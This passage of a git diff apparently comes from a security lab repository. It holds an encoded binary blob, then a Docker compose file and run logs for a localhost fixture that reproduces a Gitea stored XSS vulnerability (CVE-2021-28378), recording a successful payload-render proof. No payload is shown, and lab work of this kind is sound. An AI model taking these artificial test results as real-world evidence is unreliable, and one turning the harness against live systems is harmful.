zah!WV94*q55U{pm<KWP&F!aTD%hy1y_h*j5Cy_3b_?Tcqze|-5iFwH!_VoaiR<6hW
zzK{n8;hHvPFdLsGmHvIhrnk9-LB!QEk5U^7XlBsiCTuUmd=T7%LGO?X>-kQ=|Lu>J
zZ-^!-U#)qyIl?M(=gB9g`4;$gME*NbUmX97xs@Z4X1#k!*}}D;aA+@BHu*>5aCL(%
z5ridIbrKUaG`#bt3FXj+Iyxt_TBm3a-k!n1=GT*&D963c;OrXn$r`Fui_By34l5lI
zD(N^wn8gOUWzfe0d@_QLNF)fIJrgbD(`;#+Ec(i3^Cpl~=yuaa-v??(PGx3Ow<%xm
z0v@lum4hU{k8Iy7e|wMZZX8g$?odgmlm)-zHQud&59{#gNWVSG>cv^@;NaksQP}>l
zo&ZTq5O5Msi~F@etS8~fS?{ex-9=JM6Be6|Ig90bTyd}5w)yof6+jmFDvLduIc3p2
z2DOc`Mtx5RXb_yRS^+>28G%R6kEn*pO)hos5?qo&si<e)f7b7OJHh*-4xn%Vp8~s_
z!D%~%WYFT~5MR*!PMgUZBPpPoHT3Ru+-IVSy!n7zbU6rt0h-AWw^&6{X(^jrXHE`%
zs^E1LIlo&GAQs65G(O*@0ddw8fCw_lBrdSp$0^5hm_@VLdHZ#E!HNT%Hi$8OcR|ht
zm=<77$Y!#~#`^4?0$HValxLVpjVw5wJhMB|A^5->cNqZdAd&nXGaxZwljI%&lxwOA
zafLIW52<!oGPp!1&NN(EY>&^Doz)NN)gu5IrK2aJdOsJqyaEoB-}cw4VLuUzaPhve
zBw6y$({$HRIH>=a82!s-wEt>|L@2ezx3b;M&7f<Gpo<*{1hnnaR9$3#{!~DG^#Hp}
z0>4_VHlPB-)1`^h%bbpPm)>6x>R-_7P%1N;_|`JzF79jHpRt9$e1qs`{y~bb&Ojbe
zj(|#~5_>^F^Nb1i0w$?zE}O%GDhlO({|8kj26N#%d1zmiln+46!Wk8QgR0RDb76Tt
zA1DAM%q|6^LbJ`d^PvCqF&@A@Fi<VDwu8_&f=Mj}d-A4n+c&-5pXF2a6dqSVL@so-
zW^{i>Xb2)7(Vb&E5)hwMx=o0alWU5Ng76<?$Ae{NEe~x7TofUao}Zm9URZI>di1V0
z#R!x#Mx!OcHK%BFPlAo_Z9eC3jaN&_eiS|X0?Ee}w`wLn2`9|}?Z*-kwxhcic<wic
zerTeMjaKWwm6VoBZKsG);o%Vv=fCQ(FWMR&8D)qPkhrHB_H+SgH5C<a<!_Y!4jQ`>
z{rNl%C1fskX#e_x1EJUIxN%H1pZ=MQK{dwKXb!!fI~HQ`h37oX9B8NFaaaQus%FqR
z*MhL``^^4CH3Uf<e3<@Bxh9*>$eAChfr<Py0ybsIs;Vk6f3#Z4q!yXp{uy)lx=qOp
zB=3WRP<hjFmW0qy_5KX-fe6b;D=jH1@lSkMtGIQuyJc)~Hod3WEXB=jVK-PVy}M-N
zr-E-B47xv-3Yqgc2oAt%%TAXjb30g9j|Sps?-}0x+UDMN@oOCjc^OzS0D7Q8#hP2t
zAN~OT$zP9N9n(AHsVjUXf%IJ^L;^q~<l5=$6S&c4?O{aUd5jc(lOve06y4Zmm^N;)
z4g+{L<u1_>O&*kP7o^61uw>mz)ZaaA@|$Krxw=TEXxim{ED0`J2KjE9WPFnFC@@jx
zQco}Ltqhfxm8m{hAht8SF2G4{0m#3TpouCw9{M#8$yev)0RLO>x3Wb)Fe-Jg!U^KK
zJ(sz?F-uwF`myC%<n{XyuG?a2I?}qvAlXVkeLbn+9eu5LdlGd5$CM&wB8J`QDcdl>
z=)DWie%`~#-2Hw2_r34F4KI3ld{k;S1oXqgZHxK!bu9~{Oc!^G&EHKOVeT(qyq}@f
zp0CR^*uapjuTM_S{1r#Rc$zpbfO>XbFIYK$SB}ok0Kj~Gbbn{(z<p)EyIq_%SW%Y#
zo3QUT-uT^#o}Q_mp`Ni8p0`U|Q_b_II8<?NO+U`gl+TmFL%YA~fAUxey?exjW>r2s
zzXA<I`0`)sBL64ZYI!|n|MmOnPuvzxs|k&|H*S=4bRF>Uwska22zh3&<VWx!6|Y=5
z0Y{ss&kz-FE<m<?urWpVS9A9uSa;C(Zf?y|&mV{b4k)H1b7HdU==k{ZlCG9kFq>LL
zxy97+(Gd>$Pl_~G$h5~NCiwXH!bMq`Nvvj@VYL^7{miBprJ8(J7_fFEF-r|15ZF<5
zO8VcydY|}6pESKZUxVf+E+qJ0nRQ-+dx3S|Lhhx@HwIJ{vsIlor`_@b6Xmny8^*_7
zFyql+e-ZAgS-R39lXw}Atk9r`--vx;?;vWPckNfQNU1T0JZ59AE0#y_)Df7IvOg?F
zOMC$xwhYO|C-udyc%YBktGJ#VkT35W;LQ&i_Gf66=f&S+P~q3xwml+*a0WQiT~S<P
zV|1h=ON)@U+7IPDfLwkc5V8#t4s#-Qmy+lC>ecjiS@Kj83NGm5(yfPGvFKl^5<ai|
zB1U)`gA!kFS~;JS2bAVS<P_T@XxMaHu}DZv_GXW47;{H$`?nWAI(3iO=*qc^!0pRa
zs`DMBfkUp?Kq~S^rkl(Ds#9!P{5h}7E$q^ZZr1eU<D+}@$}g{8x>Fp?qtt!%&g+&>
zx7F9?)@S$)r#IEB53<Ms(L9`~!y_Rfu{R5B0gPd<c<<qOC97`z^qu3`z=-=y>g;^d
zuzEh7mk0$4FS`8sIdd6z8SrIGb8W0Wi6qT5UTIv#2CV^(9>-ECZ$aR>8^>i6$8Tc}
zIXBXNqqwwKDuEubhE)5jBO43*-L^{e<%R=UmHk{wkfxkYja2EyyZRGaJHEVHXK$v)
z=eTLPn8){>hk#Bo<<-uU$o#kJRi;gO@kost$IMe=*y_6gQvvz?z@<kh=d+2gZt(!h
zcXo27IrG#Kx>9ENtFdDY+4PwW_M7d^P0?Edg57Z=eW_BE*V~($(_Ua)?%k6Oc)(-C
z+YeZZwY9Zs`;%(Rq>o0uDXJBgOIvrSd*b-gQTwYC?&xFOzEJ6?hnSBz#jdWd-Zvgp
zp4C$vMRD0Y$xO?VwOsDsI@+G+1Ae}zuUv{`43lO80Bv&B%LO0U@1&Im1TZgls~1>)
z$LHZ0>x^cNpjFofrU*+&p^k|C>d)rh-XASP29q_f1XQsEqP|c`EC6N74(KqmEmD|O
z442UHu3kq($R+GV0e42_XLa;^crr37w(vCBTU&$iP_BGRx#`G0WOa~#y+t`oA*sYd
zhDS%8M|V{a`RvTnIIvWFt`$tax$qhr{7r1vw<G1P!2Uof$5CbE$UcF2puOGtcVi|5
z2BC!XIHVKP*5Lp4kEdX!NU8aR;F|kv8Ur6@eXu|aHJBTFu+CR6Jfwj-ru+2#49k7q
zfKK*XMh#^6EAt(iCug2_-8gcl=9Z6#D^g8$+65?HeV&6{)$wRqVb9o304I$}%oQR#
zk$_bijT%FsOey8PrQBO)(G&kd#41Zd3$`Bki(vjWaP!Z<s!!sad&}s^(->~s<DKyl
zkl_7n-UmaKIi?_ytGwiD-%3ey4X2W_U3e|0EqSTaNx6z8xWlKu_Q!#8G)JRUdOO9I
z&t-S`*p3dQK4g$hK9M4x2TJNe0-DQ4KXjL@Z6xRu36Ek9o5^7Ip5@j3o<!82!Cbi`
zYrT7ns-tCQ5=J!cbp01NOvkMkc7Jt7vt+Q+GnwIU4<&<rLs4T&khyc*IV4v&n(l>g
z8`&CY^7N>YbFCC`%t<BkuYDmYFPZ3rS${%iZNdWqt>5xjQS0ku0;|Nr06_>OogDk8
zxTR^yRq1{fa1m!4%rZ`<G3xi3;<#OxMIq@gNr2+gQ=Vgk9@23BK(YxX)M%ufOu4BB
zkA3GSBRT2>9;75UsGaH^@$oMW=Bd~pPOn1<+};AHt!>%09l(9DnaC?3Lz!D0brUg-
zzL!{*(xixS631@&gmabvcg-k&j~xm#4L<v#6)enLRL@+^rfPqI;C-pey6HDypt9Cl
z{E2GK#xBn;txuM|5;vpt#*5I?GdE8FLYz_1WLQ1jGmtmhEYE308>o1Le3F&SvNP(o
zaXM53p*Ey&Rcwl%PuCQDp~4sTR+PkT8ocdNRen!_0C|8bGG7kx<E8FKOz0BuG8*)<
z4Oy6;4XX^9r^%La4pN{Qd0qRX{)20(+_|L!lbUjk<82id7Snlgf|U7yHImd3sJG!e
z+85@$jW!UI^G0a(XN(#GW5sSUK#E0L#jrPsLdTiP8gNZ&li>7l(w4FRXJv&)cT?0T
zltYG*i_ms&bdR%8M`F9**|4`laJpzTMOYf5|C*Ybf!z#jj3sE8&Gn3^y4Z{rgY_yL
z+pKdJY5L-ELvN1L7vto$6J!q>sx!T<dAtGhTjRwBP?4~6-u*MXxN`q!#1gN@`E19)
zA$PH7-CLh#v;CyuN}#Uw==;wzjTSPj#kVjkM&lJpq>9Q#woP~~S78NeK?p{3>GDlF
z<%}2Lebo`hNW=WqZY;nUIU)dNKgJQA(U0Z2Gz)Yms`h#nSUl{%=Pu<5a&k5K-lnWd
z$prePvYOg_XS7gzchSn(@A+(#mb}Hb&}_MuG6U&El;e^$7-@LlTxUWKBM%-F6qmLo
z3e;g|fz-7US;51_1xcZ(cgW}HIU%OxY%wZ+v*8L_^Egi6z6pRK7MR-%nysYNfS%d|
zO63bZi5B(m`4?oriSmgXJ8v5gm4)|TO5}6hYVKla&50qj?@4goTNxmFo-y@Ru;Fp<
zecG_I{-t72#&R%=g7|wdM}yX;+F-*C+-ku8;{mts`^fZ2`G=uT#2&Gl@-A^&X;Vvw
z7*5q*DuNujeQ9YPutK?zCX1)*N!-`%jGBZ^{L&S?`HoN#V-GN7uw6fmw2fhQ4Ur$y
zjV2YaVv$Sp2N<DO#kF+-$HzJn@wDM64>ZKTXct%5TW4<dx$UH};j7*x=ifg5q6Y4G
zK=~m84JlO3J1*d;=plLzc6LHBd@rley{jXAJ9FJMp%DWy{6fdKDKB?$NG0%Q+J0V|
ze(2E>m^i%}y~8pQMuSl0;vPpKdxlzCI>xdAt9-82W_#L3D-|POL}4~jRI7Ydh%@rt
zc!iZK&6|An@^dHwehQ>!nnk)eRQMs(GEW4Dz|SCPAN&a;B1daXm)e0bTxK|83dKR=
zSaE`mj{J8cpB2RCz?-V?Fqz&)tRR1iaD6-icGM<I<{z@T*&RpMS!74LQ=R(K7!GuI
zs?J`lsAjx#TXJ6N)tgm49x~aa<R@W~#ls79-ZMTqbj(+)6T7MV+~Sw;lM=HN#--8x
zvv;#eF>FUdgR2mRe5aPp*I+o}DR{COg55U@arLKXP!oS;FE&=XQsW#>kpjy0V|2Ae
z`AzfQl!36e+3WW@hq4!e2yYwuyTJ1ULu|QMs>vtabQQh<o4HTl0skHPmuk{WHmZU-
z9@EzMF{N2zSnI>Jxq*Qep=r5Ls$hsu(V+D$R9rLmyHAp(8v=7wal~_X#WTCiM=Mlm
zzl1)KQY*0ZEm@javG7d>H8LkpkHW=`Av?&5q#umt9XXd4tbz(<@=0U#bLQ0y*;!ED
zJ|$R^qn0^CJ1DiuKj5)v<NK7N=NpMY%IBAa8E<;;(W#Xh>;G1Ku`M-E)zm{WWKm)`
zqA@BerPjL<PB%o%evF`w+)zugOad^rnwpCEvFj-e^IjT|ri)-|528@t{Kfb;j7lr-
zZRN|Bn-l%28DV`;BBAQZb{He(u<!kFiD#_T#O!Toj(U1<O2IT`*v6wJrL0e*DL{Xu
z_d-8Jxt{Kd)q0WM4$5+Dk#+}$n(Q~bV&E@ux1U>g$xKc1E%)crG#RL9;}Q>s$7vQK
z?0gZuM(tr%ul(*tSP;+c%g^9bI{Pp7B*w0bglq;;ToS*>ly>=Dv^F44AQaVd8Oj5k
zBMz6JTErLtf!#Rub5#Pu>D7x~lm#vI-7sL|!I_*`?uy+o*I~R8qTOU2c3Et-Imz{~
zKoG$zV0$Rq*!`G;ndGJ7Z!kif%kZoTs~5Q56;poIy3gq781Xpr@=%Kmx7|9K?y2=3
z@tc20IW0xKaZflQnfl=eRxK(D*@_4fz%S~IYwQ;TVJ(73W(FKC#qooz;~M*++ar2)
z%ST-(Wg^!Y6#TV^Ngg8ofz=lsx@KEA;#^0QbcV*Au8CbJ5Ka2XW}@gv#urlp=*}Q^
z3BP+xtYqoA@e^fTE057P$(dhE)jj$zrSet@V}FPB@lc}BsI2{GIt!~m^?P><AOPOl
z+6qQ!g*}xWEn7<QetyS8S2R(2!RcU#M@J$g>{(8i0U=loN>8S;<OFDHAXdY5E<n0Z
zPv$6<-)~WxP;Nd(ws4zHrARkqWDL5&xn(Jxj4cn(3rit6Wx<9Iw2uj1UArIVkSS^c
zld>x5o`UOdx#qssgB@r|zRh&d3^(G4ds`z*{uK>Qi|?Iu;9S@(_n#hq-&~D@MNRX;
z4s%Ph=&5dk&}xbXIUQSXfoC&>+~QuW3hxxkoQj*bYi&oa&5}tca#2f6LQkZhh-!29
z<QC{m^mr>sS%#~TYQKfA&TqCfOU+c&m79t}M=lRYAfUKDJFb>7M7?rkPf29Uj%*VT
zZXg1CJD1&7g?pK#-J<VoUsfpBnhrqqQjbzB?3rNbyP=!5OS+uOtn()ET>j^q!Cy>}
zkKOep$6Y2_zp;BfumbQ^@g_T)cLYlNl{(zq=f<tevMYmTVUeq^&kHW_P}%59nT(cv
z@y)YaX1{5r3YBzUg!#q|2Lfkw=_VC3BAd8P`m{*zIwDmv$xVJtEy|ti=g#zZ%3K+R
zZ~00W4cg+2_LiA0bW)^wXg^Ku#$~y*#7Zol%+eF08}=rOa38|PkWRp!ssRHHPAm0V
z>pdTj;gJ#XwO@`2l$(T6!oGLfk&%oK=Jdw-_1fnye5hOpBT3bcF150Q!xI@Q({Ha!
zud^UQm){XftyEQF1UEO^?S`519`S0jh>W2bBoj%Vg21Yr;{)%@Y(+PRhY#I&shxU)
zm{B{sZOdAB&6?>Ml7$2Bt^N5Glvr?XFtp5;CC<g|NIlXl9+9)TG`koDTysuSh&y$Q
z<z+acSS^ym`qWAelK~W?*B%i<`5<K6AGzL#eDR6ndq{6ar^e=fGhR%{MaMcf)MISv
z1YTFn$0p;B`ya|5`2i$ni?8kR^IE4JGurLz@f<xW+bR8S)%I&zkJ>~W*_Q|Mbu7q*
z0<Lw%u*sOo4O$8m%pfWs@H$qolPzgJn1c{eDwaI~x+H^QZWzFdgbDmLIur6N02=iV
zYhVC_a|92v2ZhPA)8a++3EnxH|Ev23*dEo|AT_gWw~~Y|6DC^FGnWFjm&;l=^jgSL
zp7`U=cpjnuKq{?4PpdPw<H(}0eT?UioGumR-s%XjcBLU-;Iv!FalW|^;ZhlU*?H>$
z`T-16D5T6J`c#tOk`!JnkCL=l9ez?Ml?3gc7@Ku0q3}!jpg&aMW)dbHt|vF!<J6Re
ze~qfCs6~5Ovn`HscwY|(vZFQnSZWp`e7?vi3S1&q{d05AQ5Lm`PVp!hPG|vVn+hrK
z8{Rz9e6HK_=s&l68M@^0$oS=NG#y=3U1xZpoQ|fTx!QgL9gKlk5|c@whm1fknyBa*
z6`R>uty}<$sEXsbasyWzSwaFhmtM8<H0X(U-&?l(q=G(TZP-D*P2`Q3rG&PyqDS6q
z*UpV?g6!9U316`j2$@7ae!j~P_e}5<;!qR6U7yzh#P@kNQ|2E6-V#9qnaBv(K+4GE
z0}>2y#!@RY>*@_SlaMeDN_Y1})A^WQ2FKrC{_c1_^-+IfKCPy}yw?GnreSny;$_V^
znmYyfj#2u<1%gG^dc7?HYdm(_Ia`#;J@KfA@&1vE(4-5oE7xvXF7TIw?fDZn9O~w+
z({6~?39v17ev*!TgNCd-nhj+i|N7+MLD(m?eDmCg_s7LKgNx#p@`5Q!MXpi+BbBSC
z7@ExbPb{`=AoU$7w6C<ZIw`{yy1Z9yebf$*iaL3f_<OO4=b4J;6BSyeay6V@*CQ3(
z8XF7P2iebA$dYQQ#%7rs`|Eo{g~=_6ysrA%w=!3$q+*0MLgrIYciGb=A8afiD_<;#
zjg76Wbb^#%K-{`z-^{~BZYQ5(6oOj>xS(9SPg`-cLNy5e%S?@2>%O$yo&>hABC61y
z`05vH^8B0pJzBfNdtv~~No{tVZDuI_(!ce%ymj0E&cPKtLIKO^%_(;~I)$vp3ailh
zPwz{N`oAVD33gthI|8Sarys&6A^yx*oBvurM>BhmNuw4@N?_ju><pvDjG-(Ab+aHb
zdesv866OwTejE1wEKEgVXbQgo*c!)_E@vC$(tTJYE-@KWCB8?0sQ8J$;4Fw#jEJRi
zlQh48_pMT?*~-m3>U{>H)P*~<=`sUZ1Gv^yJENr}kkyo0B_FF|t@lq_f>l>N-DGMG
zx7o7e2<>ReS_<Z+`!CZ96p~2}P`-7f;cv!TwdkXdvm^8MbT;?4z-TtnrT?D#V2-y3
z{Q)^|fAbp%=Troj(TVPyP%glFh<`p_waQhb(9zob?LTV)2r>Il$UV&V@T6Xcq5|N4
z@n!p-e0e+~jzjN`seyqB0q5Pr%us{vxh@954vI81U?-`PWBz0b{{RD}kjG;5b^^Zk
zU(O7N=~G(n;!q!@8|1s)X%5sVc_*F8Lf~_g90fcm%q3?DFS%uP*n40<TY~QVK%9Pz
zuhwE$EX~$=%*zrAv0A8P>AUZ%EP8aYgt`Ff4t)|3UbGK=j0dZ05K&QOz5@phmL#1P
z8PPmK9(&K?opHd8XW~)yy8P2G>fMIJBjm<diIHrU{1(&$61b4HuS;p!vXm;38yJ}7
z2(SNW4CWwbtAkDr%~AkVr#(Y^ji=#~@oJA0;p{AM;Srf0BI3Er10T>0CN+rYW*=%{
zMPPtgt&)j2^0?wKQDG$~{+sz*%U`($dm4iPsU9vrc<)^Qa={5`-W?J7A;$(l0d;jn
zr}e~9;ka_u20c-r<zn0%?8=qdAUoP#P<$kHuYU$CkM1&-I2@FflCV$II#o+XBfzyN
zf|uRmyY_5f;9{rx!wZ~Bd2xvo0#{`E8C2PiHYxtdxkNCi)A)5X_FvguVc0;R&L}r4
z#c4rXOCx6h^~HAo^SK}(q$^|(0UzqMTR8Yx1SQk<%4A1$=^>F@zxBRfJep6%t=675
zF8xf#_(Wf*Y=F1Y20RBG#|GmOj!f!V!m0Hwisus=lc_Hm+rT6J3!PG)ox?$fTKa2$
z!e314wcjSlBm?wXFMJJ6?<PE}l?*&TJARx$T{NN1ZOHOGK7R)_h%ahPh87srxlJd^
ziUHpT^DOO=z`1<jMDyX`>u9A(pz~VdQXa+j4%&LXQ1e9wHANs9tJZkM?PZmGgq7;w
zD5R<Vp-UeJB1_p3a{mH68FWUC7wMh2UGi=vtMim8U4hgETFi<+rlCtfag(m}kEu$r
z=uTDrl?L%NRg|+jkk?ZQ>4G^++Qg!5m!B`5PYwN$U9^XqGQM4kine9yX95`5%I5EP
z0J9w`iMs>R-!#fx^kN4YQXVFPU%YH`Gl$8b{z4~Bh&3n+KUe(=Qq|N;wey&yLxR7Z
z_URo*j?7y}R~VhlXqECbRwj`3)8Ekp>A2VTUdrXV3kb*sMz4)o1j$>O^k>98v0Fwu
zY_ut9RN2-B%KRllRAxFkTH`cZq$eIuFDrS`GCjb(+cx1*i{>1aIv+2u^TAU7<t#Ai
z;V>V6(VUDuDd;@cYK20cr3$O2OHV+@Y~-6$-@Pu(n=wZxCz)7&lkT{UfFaQ&%)rVJ
z{$dGF36TjQ!WRI+u4$Jne?Rs%AQmHjUMsFrhP~$|8_#n_<s&<%9CCcR%;T`ZhDr7s
z4Ll}&N1a}=95e8?#+K&dh2ch1(O`S%#;uK&X95xI_@UuZY{9#k5a6MT7L$Gzi+d^y
z<YsO=)9jm6u?{`~Q+cc#KfB+Q-rSC&`d2Rbe>2CS%nV5tkEeyIJl?uMmBX1^5OOnW
zomgwBH#K;dWEAbwzz8F2TXDZNDlFS<g^yGkyxBj=yMl|i?)`yvz%VWE_&mRg-zXDK
zJ21k!IL<fj&gs_nl87ZG^jZ@3^uu^<E^htKAk6NF&240-B=j0)xtoHss_kP|@Y=G-
z`HT;L>9h>xj%Ad|k{eK6`Kv@^Ddrv&`$<QN`H)*LdG4!*a#*bMly7)Dwq%NaChDUA
zloFIfZR}igPEC|m)Bq#gah}3=&2mV9JI3d`pmDZDAvZLFJfv8BqFD_98dKvqW35~^
zQ1DM@<3GD_FhF~RzCid_m-k+F2$e){m0b&*E@BsKTBkA4BQfeN*#js$0o3NFK4Rr?
z#9hRlPW)9Za|Z0Y9tgB(k;@NifM)*U-1MbBUkK~+W)JiR6#;DpOEn1m#lfM7jL-Qc
zY6Jj~Set&g-d{M?N!hP<+F@Til7vh3Os}wDd=?Aq&&3Ob=U=~G$9{MI^*tl}?D;>c
zUi{Dgz{kpqd|P{azW83r=kqx4AMrHT^7CKY^#s(CMnZxjJNx-O?^mQEdzpqt!oRMQ
zB@D8c{d0Ygon3>B>_2{<OmXn<cT)f6!v15dl^b9pQiH0=$@qI3*85sP?kXAG&pQ_j
zY7ZTe5GBM$N1vNbzYmCxj-}JrAIFxk_^ZBZXL2pqHHY)>*VnljV8vg7QuxY>{cgev
ziRL!8Mbeq9<D8Ea#}^e9mipbBSlc7P;TFOg1brtN7nOJxd<(1UF;9bxx;nuhnY*!u
zak$w$7z{@LGd`R14ZH)Hzh9X;z-qP{*kW5p#TU`gLy_B<tSv2q*P}e2D8%~n+V+YF
zok{G0Mdh(ldIr|Y5Y+N@n*6Bi+yi_1Kb*H6&t#125SN^f{{&w|J;GXv(S0XjVv_DD
z#ycSZy=_`}k@_=AI+8K$HbkZS>F#mUbsX;3Sc5!Fc!4tH0*w-3jX!=MVhE^SoPT5(
z&8X<u7Jq`FN#^}NA3VPC34%Yd(I~mgIB&wD3bn_0xG!TLBAuKak<N}z&h0#UTJTG!
z<-)$&6nh#bBqVesJWfiTo%}UGr1YjH`~Duwe?wVWwLS4_L&xBzl2H4P^S^p?YG!4H
zvXqnw4^IY9#)3&klbjsqu>Iu)|5oz9oLn)7vghyR{Tb8$^7Hh+|3v=#75?8^+yB0k
z|Gty3od4$!gMU9T|DQZCZ{S1vdgb3+F5HIyolxe#;nPcQf}4(og?(L2Snzzh|9>I=
z`)_#D{=43&Y4_Ek59e#_{X_Q^K}J8U_c#||zk4Tmo--)ldI#URhYk6}zc2s)_nuI|
ohj@1Ol0vZ^{&D$yTeyT36@GVMO@-zeT)`51B`uuy^4-V(0ZBq8H2?qr

literal 0
HcmV?d00001

diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/compose/compose.yaml b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/compose/compose.yaml
new file mode 100644
index 00000000..a94cc2b7
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/compose/compose.yaml
@@ -0,0 +1,26 @@
+services:
+  app:
+    image: python:3.12-alpine
+    networks:
+    - labnet
+    ports:
+    - 18102:3000
+    environment:
+      LAB_FIXTURE_SCENARIO: /workspace/00-environments/templates/fixtures/gitea/xss/scenario.json
+      PORT: '3000'
+    command:
+    - python
+    - /workspace/00-environments/templates/fixtures/shared/python_fixture.py
+    working_dir: /workspace
+    volumes:
+    - /Users/x/websafe:/workspace:ro
+    healthcheck:
+      test:
+      - CMD-SHELL
+      - wget -q -O - http://127.0.0.1:3000/healthz >/dev/null 2>&1 || exit 1
+      interval: 2s
+      timeout: 2s
+      retries: 20
+networks:
+  labnet:
+    driver: bridge
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json
new file mode 100644
index 00000000..d44d04cc
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json
@@ -0,0 +1,53 @@
+{
+  "steps": [
+    {
+      "kind": "runner",
+      "tool": "gitea.xss",
+      "status": "completed",
+      "status_code": 200,
+      "result_path": "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/attack.json"
+    }
+  ],
+  "success": true,
+  "detail": "stored payload rendered inside the browser proof page",
+  "before": {},
+  "attack": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "ok": true,
+      "detail": "stored payload rendered inside the browser proof page",
+      "case_id": "gitea--CVE-2021-28378"
+    }
+  },
+  "after": {},
+  "proof": {
+    "status_code": 200,
+    "ok": true,
+    "body": {
+      "success": true,
+      "detail": "stored payload rendered inside the browser proof page",
+      "case_id": "gitea--CVE-2021-28378",
+      "sink_hits": 0,
+      "uploads": [],
+      "events": [
+        {
+          "event": "seed",
+          "detail": "gitea--CVE-2021-28378"
+        },
+        {
+          "event": "attack",
+          "detail": "stored payload rendered inside the browser proof page"
+        }
+      ]
+    }
+  },
+  "assertions": [
+    {
+      "name": "proof-success",
+      "kind": "runner-proof",
+      "passed": true,
+      "detail": "stored payload rendered inside the browser proof page"
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-browser.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-browser.json
new file mode 100644
index 00000000..d9c34366
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-browser.json
@@ -0,0 +1,14 @@
+{
+  "required": true,
+  "present": true,
+  "page_title": "Gitea Stored XSS Fixture",
+  "page_url": "http://127.0.0.1:18102/",
+  "error_kind": null,
+  "refs": [
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline.png",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/assets/baseline-dom.html",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json",
+    "/Users/x/websafe/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json"
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json
new file mode 100644
index 00000000..fe51488c
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-console.json
@@ -0,0 +1 @@
+[]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json
new file mode 100644
index 00000000..cdb46ccf
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-network.json
@@ -0,0 +1,6 @@
+[
+  {
+    "method": "GET",
+    "url": "http://127.0.0.1:18102/"
+  }
+]
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json
new file mode 100644
index 00000000..ec95fa8d
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline-page.json
@@ -0,0 +1,5 @@
+{
+  "url": "http://127.0.0.1:18102/",
+  "title": "Gitea Stored XSS Fixture",
+  "body_excerpt": "\n  \n    Gitea Stored XSS Fixture\n    Stored payload rendering path for browser proof capture.\n    Baseline ready\n    System: gitea / Family: xss\n    \n    \n    \n    \n    \n  \n\n"
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline.json
new file mode 100644
index 00000000..094d98ac
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/baseline.json
@@ -0,0 +1,24 @@
+{
+  "observations": [
+    {
+      "url": "http://127.0.0.1:18102/",
+      "status_code": 200,
+      "headers": {
+        "Server": "BaseHTTP/0.6 Python/3.12.13",
+        "Date": "Wed, 18 Mar 2026 01:28:16 GMT",
+        "Content-Type": "text/html; charset=utf-8",
+        "Content-Length": "992"
+      },
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Gitea Stored XSS Fixture</title>\n  <style>\n    body { font-family: sans-serif; background: #0f172a; color: #e2e8f0; margin: 0; padding: 32px; }\n    main { max-width: 900px; margin: 0 auto; background: #111827; border: 1px solid #334155; border-radius: "
+    }
+  ],
+  "steps": [
+    {
+      "kind": "http-get",
+      "status": "completed",
+      "path": "/",
+      "status_code": 200,
+      "body_excerpt": "<!doctype html>\n<html lang=\"zh-CN\">\n<head>\n  <meta charset=\"utf-8\">\n  <meta name=\"viewport\" content=\"width=device-width, initial-scale=1\">\n  <title>Gitea Stored XSS Fixture</title>\n  <style>\n    body "
+    }
+  ]
+}
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/docker/app.log b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/docker/app.log
new file mode 100644
index 00000000..e69de29b
diff --git a/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/doctor.json b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/doctor.json
new file mode 100644
index 00000000..baedfa63
--- /dev/null
+++ b/06-case-studies/generated-runs/gitea-gitea--CVE-2021-28378-20260318012813/logs/doctor.json
@@ -0,0 +1,44 @@
+{
+  "status": "passed",
+  "ok": true,
+  "checks": [
+    {
+      "name": "docker-cli",
+      "ok": true,
+      "detail": "docker CLI available"
+    },
+    {
+      "name": "docker-daemon",
+      "ok": true,
